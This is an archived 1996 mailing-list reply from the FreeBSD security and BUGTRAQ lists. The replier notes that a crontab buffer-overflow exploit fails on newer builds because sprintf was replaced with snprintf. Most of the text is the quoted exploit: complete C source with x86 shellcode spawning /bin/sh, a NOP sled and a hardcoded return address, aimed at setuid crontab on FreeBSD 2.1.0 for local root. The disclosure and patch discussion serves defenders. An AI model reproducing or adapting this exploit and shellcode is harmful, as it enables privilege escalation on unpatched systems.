Date: Mon, 16 Dec 1996 15:58:42 -0600 (CST) From: Karl Denninger <karl@Mcs.Net> To: leshka@leshka.chuvashia.su Cc: BUGTRAQ@NETSPACE.ORG, security@freebsd.org Subject: Re: Exploit for crontab bug (FreeBSD 2.1.0). Message-ID: <199612162158.PAA19217@Jupiter.Mcs.Net> In-Reply-To: <199612142224.BAA00961@leshka.chuvashia.su> from "Leshka Zakharoff" at Dec 15, 96 01:24:02 am
next in thread | previous in thread | raw e-mail | index | archive | help
(exploit elided) This does not run on -CURRENT with crontab build dates after about mid-October. A perusal of the source shows that the evil sprintf was replaced by snprintf, and that therefore the buffer overwrite should (and appears to in fact) fail. -- -- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service | 33 Analog Prefixes, 65 ISDN, Web servers $75/mo Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/ Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal > /* ---------------------------- CUT HERE ----------------------------------- */ > /* */ > /* Hi ! */ > /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ > /* If you have any problems with it, drop me a letter. */ > /* Have fun ! */ > /* */ > /* */ > /* ---------------------- */ > /* --------------------------------------------- */ > /* ----------------- Dedicated to my beautiful lady ------------------ */ > /* --------------------------------------------- */ > /* ---------------------- */ > /* */ > /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ > > #include <stdio.h> > main() > { > #define length 353 > int i,j; > unsigned long start_addr; > char *env[]={NULL}; > char param_string[length]; > char code_string[]= > { > "\xeb\x2a" /* jmp cont */ > > /* geteip: */ "\x5d" /* popl %ebp */ > "\x55" /* pushl %ebp */ > "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ > "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ > "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ > "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ > "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ > "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ > "\xc3" /* ret */ > > /* 0xffffffe0(%ebp): */ "/bin/sh" > /* 0xffffffe7(%ebp): */ "\x01" > > /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ > "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ > > /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ > "\xe8\xcb\xff\xff\xff" /* call geteip */ > "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ > "\x55" /* pushl %ebp */ > "\x55" /* pushl %ebp */ > "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ > "\x55" /* pushl %ebp */ > "\xe8\xd4\xff\xff\xff" /* call execve */ > }; > > for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0'; > start_addr=0xefbfddf0; > *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr; > strncpy(¶m_string[200],code_string,strlen(code_string)); > *( (unsigned long*) ¶m_string[348])= start_addr; > > execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL); > > } > /* ---------------------------- CUT HERE ----------------------------------- */ > >
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199612162158.PAA19217>